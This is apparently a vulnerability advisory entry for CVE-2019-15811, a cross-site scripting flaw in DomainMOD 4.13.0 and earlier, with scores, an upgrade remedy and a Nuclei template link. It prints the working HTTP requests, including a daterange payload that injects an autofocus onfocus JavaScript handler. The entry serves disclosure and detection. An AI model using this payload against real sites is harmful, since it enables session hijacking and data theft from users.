| Title | DomainMOD <=4.13.0 - Cross-Site Scripting |
|---|---|
| Author | arafatansari |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. |
| Remediation | Upgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.01196 |
| CVE ID | CVE-2019-15811 |
| CWE ID | CWE-79 |
| Tags | cve cve2019 domainmod xss authenticated edb vuln |
DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Connection: close
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
new_username=r8Epvd&new_password=hetIIn
GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.8
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-15811.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-15811.pcap
N/AN/A